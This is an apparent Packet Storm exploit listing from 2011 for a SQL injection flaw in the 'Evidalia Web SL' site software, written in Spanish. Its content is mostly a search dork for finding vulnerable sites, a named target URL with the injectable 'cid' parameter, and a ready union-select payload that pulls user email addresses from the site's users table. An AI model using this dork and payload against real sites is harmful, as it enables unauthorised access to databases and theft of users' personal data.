Evidalia Web SL SQL Injection

2011-09-19T00:00:00
ID PACKETSTORM:105207
Type packetstorm
Reporter ruben_linux
Modified 2011-09-19T00:00:00

Description

                                        
                                            `**********************************************  
********************ruben_linux***************  
**********************************************  
******vulnerable a injeccion remota SQL*******  
  
autor==>ruben_linux  
equipo=>ruben_linux  
  
[+] DORK: "Evidalia Web SL" inurl:categoria.php?cid=  
  
[+] URL: http://www.evprogramas.com/categoria.php?cid= [slqi]  
  
[+] DEMO:  
/categoria.php?cid=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28users.email+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60evidalia%60.users+Order+by+id+limit+0%2C1%29+--  
  
***********************************************  
******************ruben_linux******************  
***********************************************  
`